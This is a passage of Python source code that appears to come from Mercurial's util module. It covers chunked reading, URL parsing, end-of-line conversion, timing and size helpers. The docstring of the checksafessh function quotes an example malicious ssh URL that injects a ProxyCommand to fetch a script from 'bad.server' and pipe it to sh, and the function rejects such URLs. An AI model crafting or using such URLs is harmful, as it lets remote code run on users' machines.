2349 2349 """Read L bytes of data from the iterator of chunks of data.
2350 2350 Returns less than L bytes if the iterator runs dry.
2351 2351
2352 2352 If size parameter is omitted, read everything"""
2353 2353 if l is None:
2354 2354 return ''.join(self.iter)
2355 2355
2356 2356 left = l
2357 2357 buf = []
2358 2358 queue = self._queue
2359 2359 while left > 0:
2360 2360 # refill the queue
2361 2361 if not queue:
2362 2362 target = 2**18
2363 2363 for chunk in self.iter:
2364 2364 queue.append(chunk)
2365 2365 target -= len(chunk)
2366 2366 if target <= 0:
2367 2367 break
2368 2368 if not queue:
2369 2369 break
2370 2370
2371 2371 # The easy way to do this would be to queue.popleft(), modify the
2372 2372 # chunk (if necessary), then queue.appendleft(). However, for cases
2373 2373 # where we read partial chunk content, this incurs 2 dequeue
2374 2374 # mutations and creates a new str for the remaining chunk in the
2375 2375 # queue. Our code below avoids this overhead.
2376 2376
2377 2377 chunk = queue[0]
2378 2378 chunkl = len(chunk)
2379 2379 offset = self._chunkoffset
2380 2380
2381 2381 # Use full chunk.
2382 2382 if offset == 0 and left >= chunkl:
2383 2383 left -= chunkl
2384 2384 queue.popleft()
2385 2385 buf.append(chunk)
2386 2386 # self._chunkoffset remains at 0.
2387 2387 continue
2388 2388
2389 2389 chunkremaining = chunkl - offset
2390 2390
2391 2391 # Use all of unconsumed part of chunk.
2392 2392 if left >= chunkremaining:
2393 2393 left -= chunkremaining
2394 2394 queue.popleft()
2395 2395 # offset == 0 is enabled by block above, so this won't merely
2396 2396 # copy via ``chunk[0:]``.
2397 2397 buf.append(chunk[offset:])
2398 2398 self._chunkoffset = 0
2399 2399
2400 2400 # Partial chunk needed.
2401 2401 else:
2402 2402 buf.append(chunk[offset:offset + left])
2403 2403 self._chunkoffset += left
2404 2404 left -= chunkremaining
2405 2405
2406 2406 return ''.join(buf)
2407 2407
2408 2408 def filechunkiter(f, size=131072, limit=None):
2409 2409 """Create a generator that produces the data in the file size
2410 2410 (default 131072) bytes at a time, up to optional limit (default is
2411 2411 to read all data). Chunks may be less than size bytes if the
2412 2412 chunk is the last chunk in the file, or the file is a socket or
2413 2413 some other type of file that sometimes reads less data than is
2414 2414 requested."""
2415 2415 assert size >= 0
2416 2416 assert limit is None or limit >= 0
2417 2417 while True:
2418 2418 if limit is None:
2419 2419 nbytes = size
2420 2420 else:
2421 2421 nbytes = min(limit, size)
2422 2422 s = nbytes and f.read(nbytes)
2423 2423 if not s:
2424 2424 break
2425 2425 if limit:
2426 2426 limit -= len(s)
2427 2427 yield s
2428 2428
2429 2429 class cappedreader(object):
2430 2430 """A file object proxy that allows reading up to N bytes.
2431 2431
2432 2432 Given a source file object, instances of this type allow reading up to
2433 2433 N bytes from that source file object. Attempts to read past the allowed
2434 2434 limit are treated as EOF.
2435 2435
2436 2436 It is assumed that I/O is not performed on the original file object
2437 2437 in addition to I/O that is performed by this instance. If there is,
2438 2438 state tracking will get out of sync and unexpected results will ensue.
2439 2439 """
2440 2440 def __init__(self, fh, limit):
2441 2441 """Allow reading up to <limit> bytes from <fh>."""
2442 2442 self._fh = fh
2443 2443 self._left = limit
2444 2444
2445 2445 def read(self, n=-1):
2446 2446 if not self._left:
2447 2447 return b''
2448 2448
2449 2449 if n < 0:
2450 2450 n = self._left
2451 2451
2452 2452 data = self._fh.read(min(n, self._left))
2453 2453 self._left -= len(data)
2454 2454 assert self._left >= 0
2455 2455
2456 2456 return data
2457 2457
2458 2458 def readinto(self, b):
2459 2459 res = self.read(len(b))
2460 2460 if res is None:
2461 2461 return None
2462 2462
2463 2463 b[0:len(res)] = res
2464 2464 return len(res)
2465 2465
2466 2466 def unitcountfn(*unittable):
2467 2467 '''return a function that renders a readable count of some quantity'''
2468 2468
2469 2469 def go(count):
2470 2470 for multiplier, divisor, format in unittable:
2471 2471 if abs(count) >= divisor * multiplier:
2472 2472 return format % (count / float(divisor))
2473 2473 return unittable[-1][2] % count
2474 2474
2475 2475 return go
2476 2476
2477 2477 def processlinerange(fromline, toline):
2478 2478 """Check that linerange <fromline>:<toline> makes sense and return a
2479 2479 0-based range.
2480 2480
2481 2481 >>> processlinerange(10, 20)
2482 2482 (9, 20)
2483 2483 >>> processlinerange(2, 1)
2484 2484 Traceback (most recent call last):
2485 2485 ...
2486 2486 ParseError: line range must be positive
2487 2487 >>> processlinerange(0, 5)
2488 2488 Traceback (most recent call last):
2489 2489 ...
2490 2490 ParseError: fromline must be strictly positive
2491 2491 """
2492 2492 if toline - fromline < 0:
2493 2493 raise error.ParseError(_("line range must be positive"))
2494 2494 if fromline < 1:
2495 2495 raise error.ParseError(_("fromline must be strictly positive"))
2496 2496 return fromline - 1, toline
2497 2497
2498 2498 bytecount = unitcountfn(
2499 2499 (100, 1 << 30, _('%.0f GB')),
2500 2500 (10, 1 << 30, _('%.1f GB')),
2501 2501 (1, 1 << 30, _('%.2f GB')),
2502 2502 (100, 1 << 20, _('%.0f MB')),
2503 2503 (10, 1 << 20, _('%.1f MB')),
2504 2504 (1, 1 << 20, _('%.2f MB')),
2505 2505 (100, 1 << 10, _('%.0f KB')),
2506 2506 (10, 1 << 10, _('%.1f KB')),
2507 2507 (1, 1 << 10, _('%.2f KB')),
2508 2508 (1, 1, _('%.0f bytes')),
2509 2509 )
2510 2510
2511 2511 class transformingwriter(object):
2512 2512 """Writable file wrapper to transform data by function"""
2513 2513
2514 2514 def __init__(self, fp, encode):
2515 2515 self._fp = fp
2516 2516 self._encode = encode
2517 2517
2518 2518 def close(self):
2519 2519 self._fp.close()
2520 2520
2521 2521 def flush(self):
2522 2522 self._fp.flush()
2523 2523
2524 2524 def write(self, data):
2525 2525 return self._fp.write(self._encode(data))
2526 2526
2527 2527 # Matches a single EOL which can either be a CRLF where repeated CR
2528 2528 # are removed or a LF. We do not care about old Macintosh files, so a
2529 2529 # stray CR is an error.
2530 2530 _eolre = remod.compile(br'\r*\n')
2531 2531
2532 2532 def tolf(s):
2533 2533 return _eolre.sub('\n', s)
2534 2534
2535 2535 def tocrlf(s):
2536 2536 return _eolre.sub('\r\n', s)
2537 2537
2538 2538 def _crlfwriter(fp):
2539 2539 return transformingwriter(fp, tocrlf)
2540 2540
2541 2541 if pycompat.oslinesep == '\r\n':
2542 2542 tonativeeol = tocrlf
2543 2543 fromnativeeol = tolf
2544 2544 nativeeolwriter = _crlfwriter
2545 2545 else:
2546 2546 tonativeeol = pycompat.identity
2547 2547 fromnativeeol = pycompat.identity
2548 2548 nativeeolwriter = pycompat.identity
2549 2549
2550 2550 if (pyplatform.python_implementation() == 'CPython' and
2551 2551 sys.version_info < (3, 0)):
2552 2552 # There is an issue in CPython that some IO methods do not handle EINTR
2553 2553 # correctly. The following table shows what CPython version (and functions)
2554 2554 # are affected (buggy: has the EINTR bug, okay: otherwise):
2555 2555 #
2556 2556 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2557 2557 # --------------------------------------------------
2558 2558 # fp.__iter__ | buggy | buggy | okay
2559 2559 # fp.read* | buggy | okay [1] | okay
2560 2560 #
2561 2561 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2562 2562 #
2563 2563 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2564 2564 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2565 2565 #
2566 2566 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2567 2567 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2568 2568 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2569 2569 # fp.__iter__ but not other fp.read* methods.
2570 2570 #
2571 2571 # On modern systems like Linux, the "read" syscall cannot be interrupted
2572 2572 # when reading "fast" files like on-disk files. So the EINTR issue only
2573 2573 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2574 2574 # files approximately as "fast" files and use the fast (unsafe) code path,
2575 2575 # to minimize the performance impact.
2576 2576 if sys.version_info >= (2, 7, 4):
2577 2577 # fp.readline deals with EINTR correctly, use it as a workaround.
2578 2578 def _safeiterfile(fp):
2579 2579 return iter(fp.readline, '')
2580 2580 else:
2581 2581 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2582 2582 # note: this may block longer than necessary because of bufsize.
2583 2583 def _safeiterfile(fp, bufsize=4096):
2584 2584 fd = fp.fileno()
2585 2585 line = ''
2586 2586 while True:
2587 2587 try:
2588 2588 buf = os.read(fd, bufsize)
2589 2589 except OSError as ex:
2590 2590 # os.read only raises EINTR before any data is read
2591 2591 if ex.errno == errno.EINTR:
2592 2592 continue
2593 2593 else:
2594 2594 raise
2595 2595 line += buf
2596 2596 if '\n' in buf:
2597 2597 splitted = line.splitlines(True)
2598 2598 line = ''
2599 2599 for l in splitted:
2600 2600 if l[-1] == '\n':
2601 2601 yield l
2602 2602 else:
2603 2603 line = l
2604 2604 if not buf:
2605 2605 break
2606 2606 if line:
2607 2607 yield line
2608 2608
2609 2609 def iterfile(fp):
2610 2610 fastpath = True
2611 2611 if type(fp) is file:
2612 2612 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2613 2613 if fastpath:
2614 2614 return fp
2615 2615 else:
2616 2616 return _safeiterfile(fp)
2617 2617 else:
2618 2618 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2619 2619 def iterfile(fp):
2620 2620 return fp
2621 2621
2622 2622 def iterlines(iterator):
2623 2623 for chunk in iterator:
2624 2624 for line in chunk.splitlines():
2625 2625 yield line
2626 2626
2627 2627 def expandpath(path):
2628 2628 return os.path.expanduser(os.path.expandvars(path))
2629 2629
2630 2630 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2631 2631 """Return the result of interpolating items in the mapping into string s.
2632 2632
2633 2633 prefix is a single character string, or a two character string with
2634 2634 a backslash as the first character if the prefix needs to be escaped in
2635 2635 a regular expression.
2636 2636
2637 2637 fn is an optional function that will be applied to the replacement text
2638 2638 just before replacement.
2639 2639
2640 2640 escape_prefix is an optional flag that allows using doubled prefix for
2641 2641 its escaping.
2642 2642 """
2643 2643 fn = fn or (lambda s: s)
2644 2644 patterns = '|'.join(mapping.keys())
2645 2645 if escape_prefix:
2646 2646 patterns += '|' + prefix
2647 2647 if len(prefix) > 1:
2648 2648 prefix_char = prefix[1:]
2649 2649 else:
2650 2650 prefix_char = prefix
2651 2651 mapping[prefix_char] = prefix_char
2652 2652 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2653 2653 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2654 2654
2655 2655 def getport(port):
2656 2656 """Return the port for a given network service.
2657 2657
2658 2658 If port is an integer, it's returned as is. If it's a string, it's
2659 2659 looked up using socket.getservbyname(). If there's no matching
2660 2660 service, error.Abort is raised.
2661 2661 """
2662 2662 try:
2663 2663 return int(port)
2664 2664 except ValueError:
2665 2665 pass
2666 2666
2667 2667 try:
2668 2668 return socket.getservbyname(pycompat.sysstr(port))
2669 2669 except socket.error:
2670 2670 raise error.Abort(_("no port number associated with service '%s'")
2671 2671 % port)
2672 2672
2673 2673 class url(object):
2674 2674 r"""Reliable URL parser.
2675 2675
2676 2676 This parses URLs and provides attributes for the following
2677 2677 components:
2678 2678
2679 2679 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2680 2680
2681 2681 Missing components are set to None. The only exception is
2682 2682 fragment, which is set to '' if present but empty.
2683 2683
2684 2684 If parsefragment is False, fragment is included in query. If
2685 2685 parsequery is False, query is included in path. If both are
2686 2686 False, both fragment and query are included in path.
2687 2687
2688 2688 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2689 2689
2690 2690 Note that for backward compatibility reasons, bundle URLs do not
2691 2691 take host names. That means 'bundle://../' has a path of '../'.
2692 2692
2693 2693 Examples:
2694 2694
2695 2695 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2696 2696 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2697 2697 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2698 2698 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2699 2699 >>> url(b'file:///home/joe/repo')
2700 2700 <url scheme: 'file', path: '/home/joe/repo'>
2701 2701 >>> url(b'file:///c:/temp/foo/')
2702 2702 <url scheme: 'file', path: 'c:/temp/foo/'>
2703 2703 >>> url(b'bundle:foo')
2704 2704 <url scheme: 'bundle', path: 'foo'>
2705 2705 >>> url(b'bundle://../foo')
2706 2706 <url scheme: 'bundle', path: '../foo'>
2707 2707 >>> url(br'c:\foo\bar')
2708 2708 <url path: 'c:\\foo\\bar'>
2709 2709 >>> url(br'\\blah\blah\blah')
2710 2710 <url path: '\\\\blah\\blah\\blah'>
2711 2711 >>> url(br'\\blah\blah\blah#baz')
2712 2712 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2713 2713 >>> url(br'file:///C:\users\me')
2714 2714 <url scheme: 'file', path: 'C:\\users\\me'>
2715 2715
2716 2716 Authentication credentials:
2717 2717
2718 2718 >>> url(b'ssh://joe:xyz@x/repo')
2719 2719 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2720 2720 >>> url(b'ssh://joe@x/repo')
2721 2721 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2722 2722
2723 2723 Query strings and fragments:
2724 2724
2725 2725 >>> url(b'http://host/a?b#c')
2726 2726 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2727 2727 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2728 2728 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2729 2729
2730 2730 Empty path:
2731 2731
2732 2732 >>> url(b'')
2733 2733 <url path: ''>
2734 2734 >>> url(b'#a')
2735 2735 <url path: '', fragment: 'a'>
2736 2736 >>> url(b'http://host/')
2737 2737 <url scheme: 'http', host: 'host', path: ''>
2738 2738 >>> url(b'http://host/#a')
2739 2739 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2740 2740
2741 2741 Only scheme:
2742 2742
2743 2743 >>> url(b'http:')
2744 2744 <url scheme: 'http'>
2745 2745 """
2746 2746
2747 2747 _safechars = "!~*'()+"
2748 2748 _safepchars = "/!~*'()+:\\"
2749 2749 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2750 2750
2751 2751 def __init__(self, path, parsequery=True, parsefragment=True):
2752 2752 # We slowly chomp away at path until we have only the path left
2753 2753 self.scheme = self.user = self.passwd = self.host = None
2754 2754 self.port = self.path = self.query = self.fragment = None
2755 2755 self._localpath = True
2756 2756 self._hostport = ''
2757 2757 self._origpath = path
2758 2758
2759 2759 if parsefragment and '#' in path:
2760 2760 path, self.fragment = path.split('#', 1)
2761 2761
2762 2762 # special case for Windows drive letters and UNC paths
2763 2763 if hasdriveletter(path) or path.startswith('\\\\'):
2764 2764 self.path = path
2765 2765 return
2766 2766
2767 2767 # For compatibility reasons, we can't handle bundle paths as
2768 2768 # normal URLS
2769 2769 if path.startswith('bundle:'):
2770 2770 self.scheme = 'bundle'
2771 2771 path = path[7:]
2772 2772 if path.startswith('//'):
2773 2773 path = path[2:]
2774 2774 self.path = path
2775 2775 return
2776 2776
2777 2777 if self._matchscheme(path):
2778 2778 parts = path.split(':', 1)
2779 2779 if parts[0]:
2780 2780 self.scheme, path = parts
2781 2781 self._localpath = False
2782 2782
2783 2783 if not path:
2784 2784 path = None
2785 2785 if self._localpath:
2786 2786 self.path = ''
2787 2787 return
2788 2788 else:
2789 2789 if self._localpath:
2790 2790 self.path = path
2791 2791 return
2792 2792
2793 2793 if parsequery and '?' in path:
2794 2794 path, self.query = path.split('?', 1)
2795 2795 if not path:
2796 2796 path = None
2797 2797 if not self.query:
2798 2798 self.query = None
2799 2799
2800 2800 # // is required to specify a host/authority
2801 2801 if path and path.startswith('//'):
2802 2802 parts = path[2:].split('/', 1)
2803 2803 if len(parts) > 1:
2804 2804 self.host, path = parts
2805 2805 else:
2806 2806 self.host = parts[0]
2807 2807 path = None
2808 2808 if not self.host:
2809 2809 self.host = None
2810 2810 # path of file:///d is /d
2811 2811 # path of file:///d:/ is d:/, not /d:/
2812 2812 if path and not hasdriveletter(path):
2813 2813 path = '/' + path
2814 2814
2815 2815 if self.host and '@' in self.host:
2816 2816 self.user, self.host = self.host.rsplit('@', 1)
2817 2817 if ':' in self.user:
2818 2818 self.user, self.passwd = self.user.split(':', 1)
2819 2819 if not self.host:
2820 2820 self.host = None
2821 2821
2822 2822 # Don't split on colons in IPv6 addresses without ports
2823 2823 if (self.host and ':' in self.host and
2824 2824 not (self.host.startswith('[') and self.host.endswith(']'))):
2825 2825 self._hostport = self.host
2826 2826 self.host, self.port = self.host.rsplit(':', 1)
2827 2827 if not self.host:
2828 2828 self.host = None
2829 2829
2830 2830 if (self.host and self.scheme == 'file' and
2831 2831 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2832 2832 raise error.Abort(_('file:// URLs can only refer to localhost'))
2833 2833
2834 2834 self.path = path
2835 2835
2836 2836 # leave the query string escaped
2837 2837 for a in ('user', 'passwd', 'host', 'port',
2838 2838 'path', 'fragment'):
2839 2839 v = getattr(self, a)
2840 2840 if v is not None:
2841 2841 setattr(self, a, urlreq.unquote(v))
2842 2842
2843 2843 @encoding.strmethod
2844 2844 def __repr__(self):
2845 2845 attrs = []
2846 2846 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2847 2847 'query', 'fragment'):
2848 2848 v = getattr(self, a)
2849 2849 if v is not None:
2850 2850 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2851 2851 return '<url %s>' % ', '.join(attrs)
2852 2852
2853 2853 def __bytes__(self):
2854 2854 r"""Join the URL's components back into a URL string.
2855 2855
2856 2856 Examples:
2857 2857
2858 2858 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2859 2859 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2860 2860 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2861 2861 'http://user:pw@host:80/?foo=bar&baz=42'
2862 2862 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2863 2863 'http://user:pw@host:80/?foo=bar%3dbaz'
2864 2864 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2865 2865 'ssh://user:pw@[::1]:2200//home/joe#'
2866 2866 >>> bytes(url(b'http://localhost:80//'))
2867 2867 'http://localhost:80//'
2868 2868 >>> bytes(url(b'http://localhost:80/'))
2869 2869 'http://localhost:80/'
2870 2870 >>> bytes(url(b'http://localhost:80'))
2871 2871 'http://localhost:80/'
2872 2872 >>> bytes(url(b'bundle:foo'))
2873 2873 'bundle:foo'
2874 2874 >>> bytes(url(b'bundle://../foo'))
2875 2875 'bundle:../foo'
2876 2876 >>> bytes(url(b'path'))
2877 2877 'path'
2878 2878 >>> bytes(url(b'file:///tmp/foo/bar'))
2879 2879 'file:///tmp/foo/bar'
2880 2880 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2881 2881 'file:///c:/tmp/foo/bar'
2882 2882 >>> print(url(br'bundle:foo\bar'))
2883 2883 bundle:foo\bar
2884 2884 >>> print(url(br'file:///D:\data\hg'))
2885 2885 file:///D:\data\hg
2886 2886 """
2887 2887 if self._localpath:
2888 2888 s = self.path
2889 2889 if self.scheme == 'bundle':
2890 2890 s = 'bundle:' + s
2891 2891 if self.fragment:
2892 2892 s += '#' + self.fragment
2893 2893 return s
2894 2894
2895 2895 s = self.scheme + ':'
2896 2896 if self.user or self.passwd or self.host:
2897 2897 s += '//'
2898 2898 elif self.scheme and (not self.path or self.path.startswith('/')
2899 2899 or hasdriveletter(self.path)):
2900 2900 s += '//'
2901 2901 if hasdriveletter(self.path):
2902 2902 s += '/'
2903 2903 if self.user:
2904 2904 s += urlreq.quote(self.user, safe=self._safechars)
2905 2905 if self.passwd:
2906 2906 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2907 2907 if self.user or self.passwd:
2908 2908 s += '@'
2909 2909 if self.host:
2910 2910 if not (self.host.startswith('[') and self.host.endswith(']')):
2911 2911 s += urlreq.quote(self.host)
2912 2912 else:
2913 2913 s += self.host
2914 2914 if self.port:
2915 2915 s += ':' + urlreq.quote(self.port)
2916 2916 if self.host:
2917 2917 s += '/'
2918 2918 if self.path:
2919 2919 # TODO: similar to the query string, we should not unescape the
2920 2920 # path when we store it, the path might contain '%2f' = '/',
2921 2921 # which we should *not* escape.
2922 2922 s += urlreq.quote(self.path, safe=self._safepchars)
2923 2923 if self.query:
2924 2924 # we store the query in escaped form.
2925 2925 s += '?' + self.query
2926 2926 if self.fragment is not None:
2927 2927 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2928 2928 return s
2929 2929
2930 2930 __str__ = encoding.strmethod(__bytes__)
2931 2931
2932 2932 def authinfo(self):
2933 2933 user, passwd = self.user, self.passwd
2934 2934 try:
2935 2935 self.user, self.passwd = None, None
2936 2936 s = bytes(self)
2937 2937 finally:
2938 2938 self.user, self.passwd = user, passwd
2939 2939 if not self.user:
2940 2940 return (s, None)
2941 2941 # authinfo[1] is passed to urllib2 password manager, and its
2942 2942 # URIs must not contain credentials. The host is passed in the
2943 2943 # URIs list because Python < 2.4.3 uses only that to search for
2944 2944 # a password.
2945 2945 return (s, (None, (s, self.host),
2946 2946 self.user, self.passwd or ''))
2947 2947
2948 2948 def isabs(self):
2949 2949 if self.scheme and self.scheme != 'file':
2950 2950 return True # remote URL
2951 2951 if hasdriveletter(self.path):
2952 2952 return True # absolute for our purposes - can't be joined()
2953 2953 if self.path.startswith(br'\\'):
2954 2954 return True # Windows UNC path
2955 2955 if self.path.startswith('/'):
2956 2956 return True # POSIX-style
2957 2957 return False
2958 2958
2959 2959 def localpath(self):
2960 2960 if self.scheme == 'file' or self.scheme == 'bundle':
2961 2961 path = self.path or '/'
2962 2962 # For Windows, we need to promote hosts containing drive
2963 2963 # letters to paths with drive letters.
2964 2964 if hasdriveletter(self._hostport):
2965 2965 path = self._hostport + '/' + self.path
2966 2966 elif (self.host is not None and self.path
2967 2967 and not hasdriveletter(path)):
2968 2968 path = '/' + path
2969 2969 return path
2970 2970 return self._origpath
2971 2971
2972 2972 def islocal(self):
2973 2973 '''whether localpath will return something that posixfile can open'''
2974 2974 return (not self.scheme or self.scheme == 'file'
2975 2975 or self.scheme == 'bundle')
2976 2976
2977 2977 def hasscheme(path):
2978 2978 return bool(url(path).scheme)
2979 2979
2980 2980 def hasdriveletter(path):
2981 2981 return path and path[1:2] == ':' and path[0:1].isalpha()
2982 2982
2983 2983 def urllocalpath(path):
2984 2984 return url(path, parsequery=False, parsefragment=False).localpath()
2985 2985
2986 2986 def checksafessh(path):
2987 2987 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2988 2988
2989 2989 This is a sanity check for ssh urls. ssh will parse the first item as
2990 2990 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2991 2991 Let's prevent these potentially exploited urls entirely and warn the
2992 2992 user.
2993 2993
2994 2994 Raises an error.Abort when the url is unsafe.
2995 2995 """
2996 2996 path = urlreq.unquote(path)
2997 2997 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2998 2998 raise error.Abort(_('potentially unsafe url: %r') %
2999 2999 (pycompat.bytestr(path),))
3000 3000
3001 3001 def hidepassword(u):
3002 3002 '''hide user credential in a url string'''
3003 3003 u = url(u)
3004 3004 if u.passwd:
3005 3005 u.passwd = '***'
3006 3006 return bytes(u)
3007 3007
3008 3008 def removeauth(u):
3009 3009 '''remove all authentication information from a url string'''
3010 3010 u = url(u)
3011 3011 u.user = u.passwd = None
3012 3012 return bytes(u)
3013 3013
3014 3014 timecount = unitcountfn(
3015 3015 (1, 1e3, _('%.0f s')),
3016 3016 (100, 1, _('%.1f s')),
3017 3017 (10, 1, _('%.2f s')),
3018 3018 (1, 1, _('%.3f s')),
3019 3019 (100, 0.001, _('%.1f ms')),
3020 3020 (10, 0.001, _('%.2f ms')),
3021 3021 (1, 0.001, _('%.3f ms')),
3022 3022 (100, 0.000001, _('%.1f us')),
3023 3023 (10, 0.000001, _('%.2f us')),
3024 3024 (1, 0.000001, _('%.3f us')),
3025 3025 (100, 0.000000001, _('%.1f ns')),
3026 3026 (10, 0.000000001, _('%.2f ns')),
3027 3027 (1, 0.000000001, _('%.3f ns')),
3028 3028 )
3029 3029
3030 3030 @attr.s
3031 3031 class timedcmstats(object):
3032 3032 """Stats information produced by the timedcm context manager on entering."""
3033 3033
3034 3034 # the starting value of the timer as a float (meaning and resulution is
3035 3035 # platform dependent, see util.timer)
3036 3036 start = attr.ib(default=attr.Factory(lambda: timer()))
3037 3037 # the number of seconds as a floating point value; starts at 0, updated when
3038 3038 # the context is exited.
3039 3039 elapsed = attr.ib(default=0)
3040 3040 # the number of nested timedcm context managers.
3041 3041 level = attr.ib(default=1)
3042 3042
3043 3043 def __bytes__(self):
3044 3044 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3045 3045
3046 3046 __str__ = encoding.strmethod(__bytes__)
3047 3047
3048 3048 @contextlib.contextmanager
3049 3049 def timedcm(whencefmt, *whenceargs):
3050 3050 """A context manager that produces timing information for a given context.
3051 3051
3052 3052 On entering a timedcmstats instance is produced.
3053 3053
3054 3054 This context manager is reentrant.
3055 3055
3056 3056 """
3057 3057 # track nested context managers
3058 3058 timedcm._nested += 1
3059 3059 timing_stats = timedcmstats(level=timedcm._nested)
3060 3060 try:
3061 3061 with tracing.log(whencefmt, *whenceargs):
3062 3062 yield timing_stats
3063 3063 finally:
3064 3064 timing_stats.elapsed = timer() - timing_stats.start
3065 3065 timedcm._nested -= 1
3066 3066
3067 3067 timedcm._nested = 0
3068 3068
3069 3069 def timed(func):
3070 3070 '''Report the execution time of a function call to stderr.
3071 3071
3072 3072 During development, use as a decorator when you need to measure
3073 3073 the cost of a function, e.g. as follows:
3074 3074
3075 3075 @util.timed
3076 3076 def foo(a, b, c):
3077 3077 pass
3078 3078 '''
3079 3079
3080 3080 def wrapper(*args, **kwargs):
3081 3081 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3082 3082 result = func(*args, **kwargs)
3083 3083 stderr = procutil.stderr
3084 3084 stderr.write('%s%s: %s\n' % (
3085 3085 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3086 3086 time_stats))
3087 3087 return result
3088 3088 return wrapper
3089 3089
3090 3090 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3091 3091 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3092 3092
3093 3093 def sizetoint(s):
3094 3094 '''Convert a space specifier to a byte count.
3095 3095
3096 3096 >>> sizetoint(b'30')
3097 3097 30
3098 3098 >>> sizetoint(b'2.2kb')
3099 3099 2252
3100 3100 >>> sizetoint(b'6M')
3101 3101 6291456
3102 3102 '''
3103 3103 t = s.strip().lower()
3104 3104 try:
3105 3105 for k, u in _sizeunits:
3106 3106 if t.endswith(k):
3107 3107 return int(float(t[:-len(k)]) * u)
3108 3108 return int(t)
3109 3109 except ValueError:
3110 3110 raise error.ParseError(_("couldn't parse size: %s") % s)
3111 3111
3112 3112 class hooks(object):
3113 3113 '''A collection of hook functions that can be used to extend a
3114 3114 function's behavior. Hooks are called in lexicographic order,
3115 3115 based on the names of their sources.'''
3116 3116
3117 3117 def __init__(self):
3118 3118 self._hooks = []
3119 3119
3120 3120 def add(self, source, hook):
3121 3121 self._hooks.append((source, hook))
3122 3122
3123 3123 def __call__(self, *args):
3124 3124 self._hooks.sort(key=lambda x: x[0])
3125 3125 results = []
3126 3126 for source, hook in self._hooks:
3127 3127 results.append(hook(*args))
3128 3128 return results
3129 3129
3130 3130 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3131 3131 '''Yields lines for a nicely formatted stacktrace.
3132 3132 Skips the 'skip' last entries, then return the last 'depth' entries.
3133 3133 Each file+linenumber is formatted according to fileline.
3134 3134 Each line is formatted according to line.
3135 3135 If line is None, it yields:
3136 3136 length of longest filepath+line number,
3137 3137 filepath+linenumber,
3138 3138 function
3139 3139
3140 3140 Not be used in production code but very convenient while developing.
3141 3141 '''
3142 3142 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3143 3143 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3144 3144 ][-depth:]
3145 3145 if entries:
3146 3146 fnmax = max(len(entry[0]) for entry in entries)
3147 3147 for fnln, func in entries:
3148 3148 if line is None:
3149 3149 yield (fnmax, fnln, func)
3150 3150 else:
3151 3151 yield line % (fnmax, fnln, func)
3152 3152
3153 3153 def debugstacktrace(msg='stacktrace', skip=0,
3154 3154 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3155 3155 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3156 3156 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3157 3157 By default it will flush stdout first.
3158 3158 It can be used everywhere and intentionally does not require an ui object.
3159 3159 Not be used in production code but very convenient while developing.
3160 3160 '''
3161 3161 if otherf:
3162 3162 otherf.flush()
3163 3163 f.write('%s at:\n' % msg.rstrip())
3164 3164 for line in getstackframes(skip + 1, depth=depth):
3165 3165 f.write(line)
3166 3166 f.flush()
3167 3167
3168 3168 class dirs(object):
3169 3169 '''a multiset of directory names from a dirstate or manifest'''
3170 3170
3171 3171 def __init__(self, map, skip=None):
3172 3172 self._dirs = {}
3173 3173 addpath = self.addpath
3174 3174 if safehasattr(map, 'iteritems') and skip is not None:
3175 3175 for f, s in map.iteritems():
3176 3176 if s[0] != skip:
3177 3177 addpath(f)
3178 3178 else:
3179 3179 for f in map:
3180 3180 addpath(f)
